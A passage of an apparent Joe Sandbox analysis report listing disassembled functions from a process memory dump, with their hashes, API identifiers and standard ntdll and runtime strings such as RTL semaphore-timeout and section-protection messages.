                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: f8a8a9664c130871815dc89b1d0eb2179d2a4f6a2d03f7ef690bf1506c5c8819
                                                                                              • Instruction ID: 5257bb4a74be1d3f5e5e143d9c919257080b0f2be7ecffcd74067e051cffd85a
                                                                                              • Opcode Fuzzy Hash: f8a8a9664c130871815dc89b1d0eb2179d2a4f6a2d03f7ef690bf1506c5c8819
                                                                                              • Instruction Fuzzy Hash: 38614A71D00699A6CB34DF5AC8808BEBBF5EF94304754D46EF4E667681D334AA80DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00F43B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: ef46748050fcea6689edca659736cf28a6cbe160a4d4631c4515e0740c70a3f5
                                                                                              • Instruction ID: cd9d516afd200e8b786493ccfa62d76aebb69a1e6f817ebe9a03e7f597d48917
                                                                                              • Opcode Fuzzy Hash: ef46748050fcea6689edca659736cf28a6cbe160a4d4631c4515e0740c70a3f5
                                                                                              • Instruction Fuzzy Hash: 7F61A172D00649ABCB20DF99C88157EBFF5EF58320B14C529FDA9AB141E234EB41EB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ED7EFD Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00EF3F12
                                                                                              Strings
                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00EF3F75
                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00EFE345
                                                                                              • 'u, xrefs: 00ED7F1E
                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00EF3EC4
                                                                                              • ExecuteOptions, xrefs: 00EF3F04
                                                                                              • Execute=1, xrefs: 00EF3F5E
                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00EF3F4A
                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00EFE2FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: BaseDataModuleQuery
                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$'u
                                                                                              • API String ID: 3901378454-3930412660
                                                                                              • Opcode ID: ae0a11daac389066c2566f232a50581a1dda850eabcb6033831a8943b50d08b2
                                                                                              • Instruction ID: 31468f1b314d79c3c3a32e5c5b5ce5587dfbb9c66c5944c6e85742e5a8cf5709
                                                                                              • Opcode Fuzzy Hash: ae0a11daac389066c2566f232a50581a1dda850eabcb6033831a8943b50d08b2
                                                                                              • Instruction Fuzzy Hash: 9D41A872B4031C7ADB209BA4DC86FEA73FDEB19704F0014A9F645F6191F670AB458B61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EE0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fassign
                                                                                              • String ID: .$:$:
                                                                                              • API String ID: 3965848254-2308638275
                                                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                              • Instruction ID: 9f3356cc6e85de82ec3fc5e1e269d1d797bf493ab2ae70f869780e6e718c0473
                                                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                              • Instruction Fuzzy Hash: 98A1AB71D0028EDBCB24CF66D8447BEB7B4BB44718F34A56AD806B7282D7B09AC1DB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EE0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F02206
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-4236105082
                                                                                              • Opcode ID: 2957d4f1533035db51937e3d06689259387864bb5fdbbbb7ec8e3ac76e05664d
                                                                                              • Instruction ID: 4ca26b24f8b45ec854192380b25b031061603da192b4b5d5f52242a22c0df703
                                                                                              • Opcode Fuzzy Hash: 2957d4f1533035db51937e3d06689259387864bb5fdbbbb7ec8e3ac76e05664d
                                                                                              • Instruction Fuzzy Hash: BE516D71B002056FEB55CA18DC85FA633AA9FC4720F215219FD04EF2C6EA71EC4197A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EE14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___swprintf_l.LIBCMT ref: 00F0EA22
                                                                                                • Part of subcall function 00EE13CB: ___swprintf_l.LIBCMT ref: 00EE146B
                                                                                                • Part of subcall function 00EE13CB: ___swprintf_l.LIBCMT ref: 00EE1490
                                                                                              • ___swprintf_l.LIBCMT ref: 00EE156D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              • Opcode ID: fe61437ce050a3dad68002b331e6b4f1204b6e1618a87d95609e3ffa8b6c662b
                                                                                              • Instruction ID: 1954a2ff367b9d5cc3ba4f5be3b8945691111acbf9d3b7ebbbed93c35ab789df
                                                                                              • Opcode Fuzzy Hash: fe61437ce050a3dad68002b331e6b4f1204b6e1618a87d95609e3ffa8b6c662b
                                                                                              • Instruction Fuzzy Hash: 4D21E372A0021D9BCB20DE59CC01AEA73BCFB54310F445496FC46F7241EB70AA988BE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00F43DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              • Opcode ID: 643658278ea4e25b7880e90a13907ea9f6025179e8c063cc783bc2d2603c24ee
                                                                                              • Instruction ID: 13ad1e4fc671b529df2a296f9cbed5c86018408d173d96dbe273bce9c60e7295
                                                                                              • Opcode Fuzzy Hash: 643658278ea4e25b7880e90a13907ea9f6025179e8c063cc783bc2d2603c24ee
                                                                                              • Instruction Fuzzy Hash: 2321F572E0162AABCB10AE68CC419EF7BACEF18764F040525FC04A7241E774AF48D7E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EC53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F022F4
                                                                                              Strings
                                                                                              • RTL: Re-Waiting, xrefs: 00F02328
                                                                                              • RTL: Resource at %p, xrefs: 00F0230B
                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00F022FC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-871070163
                                                                                              • Opcode ID: df79cce983ce2d75db2b0f3df31ada859928ab9e0de1c30283ff7dca02db32e9
                                                                                              • Instruction ID: 3924624a0c7b8daa9aab64648dc294dfe97f14f7a16436273285d3eaf8b68f71
                                                                                              • Opcode Fuzzy Hash: df79cce983ce2d75db2b0f3df31ada859928ab9e0de1c30283ff7dca02db32e9
                                                                                              • Instruction Fuzzy Hash: D2514B727007456BEF119B78CC85FA673D8AF94360F105229FD04EB2C6EB61EC4297A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ECEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              • RTL: Re-Waiting, xrefs: 00F024FA
                                                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00F0248D
                                                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00F024BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                              • API String ID: 0-3177188983
                                                                                              • Opcode ID: 2f096d8131b04a2d0ea40750d3c37728c68b4cf721e4e7efa24122a5c8bb1e2d
                                                                                              • Instruction ID: 50598d51bb14f9a16af7382fa2bc8238214d5bd012b77f44e76673f7cee395c3
                                                                                              • Opcode Fuzzy Hash: 2f096d8131b04a2d0ea40750d3c37728c68b4cf721e4e7efa24122a5c8bb1e2d
                                                                                              • Instruction Fuzzy Hash: 6C41F370A00204ABCB60DB68CD89FAA77E9AF84320F209609F515EB2C2D735ED41A771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EDFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fassign
                                                                                              • String ID:
                                                                                              • API String ID: 3965848254-0
                                                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                              • Instruction ID: f0daf8a5adbfca2eb21ddf70d7c06355643de99056b1df51519584f1c95993d1
                                                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                              • Instruction Fuzzy Hash: FF919F31D0024AEBDF24DF58C8457EEB7B5EF55318F24947BD802B62A2E7305A42EB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00F55CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: $$0
                                                                                              • API String ID: 1302938615-389342756
                                                                                              • Opcode ID: 7a766501e705e82950514fab4fa473020608baf63e430a4bd578bc89df809847
                                                                                              • Instruction ID: 33a009e3e1c745f2787fac2674d4e34a1d69df51bde5f1a09af90fadf32113d2
                                                                                              • Opcode Fuzzy Hash: 7a766501e705e82950514fab4fa473020608baf63e430a4bd578bc89df809847
                                                                                              • Instruction Fuzzy Hash: 3391D531D08B8ADFDF24CF99C4653EDBBB0AF01B22F14455ADEA1A7291C3744A49EB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00F1E759 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • ], xrefs: 00F1E75B
                                                                                              • Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 00F1E893
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcstoul
                                                                                              • String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X$]
                                                                                              • API String ID: 1097018459-2671679092
                                                                                              • Opcode ID: af0728b4bcad36766d6cc3fb32c9557d091754e9759d3477101ce9383d23addb
                                                                                              • Instruction ID: cda36d297fa7f927ec1afafe2f9aaaaf9806b156acadc8b412359c36bd259903
                                                                                              • Opcode Fuzzy Hash: af0728b4bcad36766d6cc3fb32c9557d091754e9759d3477101ce9383d23addb
                                                                                              • Instruction Fuzzy Hash: 0A418072D00249AADF119FE4C885BEEB7F9AF09320F14846AF911A7181E774DAC4E760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EDC558 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • 1, xrefs: 00EDC56F
                                                                                              • {%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 00EDC5BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: 1${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                                                                              • API String ID: 48624451-1603231898
                                                                                              • Opcode ID: 9b31a080ecbab45973959af9b9c3bcc7c6c69c9e0091f53cd358d4f3af5736a1
                                                                                              • Instruction ID: 1ca09e5faf87b90333ac96e812ef904af05b7408fdc594a189665b2c81b92449
                                                                                              • Opcode Fuzzy Hash: 9b31a080ecbab45973959af9b9c3bcc7c6c69c9e0091f53cd358d4f3af5736a1
                                                                                              • Instruction Fuzzy Hash: 430165560085B065D32147A74811872FBF99FCEA15728C48EF6D849296E17BD542E770
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00F1E8DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcstoul.LIBCMT ref: 00F1E901
                                                                                                • Part of subcall function 00F55AA6: __cftof.LIBCMT ref: 00F55AB6
                                                                                              Strings
                                                                                              • ], xrefs: 00F1E8E3
                                                                                              • CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 00F1E91B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: __cftof_wcstoul
                                                                                              • String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X$]
                                                                                              • API String ID: 1831096779-2103298067
